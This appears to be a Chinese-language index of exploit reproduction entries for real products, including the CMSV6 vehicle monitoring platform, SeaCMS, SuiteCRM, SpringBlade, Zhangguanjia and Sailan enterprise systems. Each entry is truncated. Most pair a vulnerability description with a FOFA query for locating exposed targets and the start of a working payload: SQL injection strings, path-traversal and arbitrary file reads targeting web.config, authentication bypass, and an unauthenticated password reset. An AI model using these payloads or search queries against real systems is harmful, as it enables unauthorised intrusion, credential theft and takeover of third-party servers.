T1-4通天星-CMSV6车载监控平台-文件上传漏洞 漏洞描述: 通天星CMSV6 车载定位监控平台upload接口处存在文件上传漏洞,攻击者可通过该漏洞直接上传一个 webshell 到服务器上,获取服务器权限,进⽽控制整个 web 服务器。 影响版本: version < 7.33.0.2_20
T1-3通天星-CMSV6车载定位监控平台-InformationLeakage 漏洞描述: 通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser.action接口处存在信息泄露漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部账户密码等敏感信息,登录后台
T1-2通天星-CMSV6车载视频监控平台-任意文件读取 漏洞描述: 通天星CMSV6车载视频监控平台 StandardReportMediaAction_getImage.action接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态 网站图
T1-1通天星-CMSV6车载定位监控平台-SQL 漏洞描述: 该漏洞是由于通天星CMSV6车载定位监控平台/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合
S48-1山石网科-应用防火墙-PermissionAC 漏洞描述: 山石网科 Web 应用防火墙(WAF)是专业智能的Web 应用安全防护产品,在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术,帮助用户轻松应对应用层风险,确保网站全天候的安全运营。在WAF的验证码
S47-1SeaCMS-海洋影视管理系统-SQL 漏洞描述: SeaCMS海洋影视管理系统index.php存在SQL注入漏洞,攻击者可获取数据库敏感数据。 fofa语法: app=“海洋CMS” 漏洞复现: payload: POST /js/player/dmplayer/dmku/index.
S46-1深圳智互联科技有限公司-SRM智联云采系统-任意文件读取 漏洞描述: 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞 fofa语法: title==“SRM 2.0” 漏洞复现: payload: GET /adpweb/static/%2e%2e;/a/
S45-1苏州梓川信息科技有限公司-PEPM-RCE 漏洞描述: PEPM系统存在远程代码执行漏洞,Cookie的auth字段存在反序列化漏洞,攻击者可构造反序列化链生成恶意数据,执行任意PHP代码。 影响版本: PEPM < V6.7.3.20240507.Release fofa语法: head
S44-3上海建业信息科技股份-章管家-PermissionAC 漏洞复现: 任意账号密码重置漏洞 payload: POST /app/updatePwd.htm HTTP/1.1 Host: User-Agent: python-requests/2.31.0 Accept-Encoding:
S44-2上海建业信息科技股份-章管家-SQL 漏洞复现: POC1 payload: POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1 Host:127.0
S44-1上海建业信息科技股份-章管家-PermissionAC 漏洞描述: 章管家 /api/personSeal_jdy/saveUser.htm 接口处存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 fo
S43-1赛蓝-企业管理系统 -PermissionAC 漏洞描述: 赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。 fofa
S41-1SpringBlade-后台框架-SQL fofa语法: body=“https://bladex.vip” 漏洞复现: payload: GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 H
S39-1SuiteCRM-SQL 漏洞复现: payload: GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept H
S40-1Sharp-多功能打印机-PermissionAC 漏洞复现: payload: /installed_emanual_list.html 效果图:
S38-3赛蓝-企业管理系统-SQL 漏洞复现: payload: GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CCHAR%2811
S38-2赛蓝-企业管理系统-任意文件读取 漏洞复现: payload: GET /Utility/GetJSFile?filePath=/web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
S38-1赛蓝-企业管理系统-任意文件读取 漏洞复现: payload: GET /BaseModule/ReportManage/DownloadBuilder?filename=//web.config HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0
S37-1数字通指尖云平台-智慧政务payslip-SQL 漏洞复现: payload: GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=SELECT 4050 FROM(SELECT COUNT(*),CONCAT((